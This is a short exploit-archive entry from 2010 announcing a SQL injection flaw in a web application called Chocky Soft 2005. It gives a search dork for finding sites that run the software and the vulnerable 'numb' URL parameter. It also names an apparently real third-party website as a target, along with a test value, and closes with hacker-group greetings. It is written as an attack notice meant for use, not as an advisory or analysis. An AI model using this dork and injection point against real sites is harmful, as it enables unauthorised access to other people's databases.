id: 12496
date: 06/01/2010
title: Chocky Soft 2005 SQL Injection Vulnerability
author: BlaCK CobRa
cves: 

============================================
Chocky Soft 2005 SQL Injection Vulnerability
============================================


Author : BlaCK CobRa

software link : N/A

d0rk : Powered by Chocky Soft 2005

===============_-BlaCK CobRa _-=============

Exp :

http:/localhost/en.php?navigation=show&numb={SQl inj3ct0r}

http://www.imotbg.net/en.php?navigation=show&numb=-36

===============_-BlaCK CobRa _-=============


gr34tz t0 : Mod4m3R H4ck3r - and all v4-team.com/cc memebers



#  0day.today [2023-03-27]  #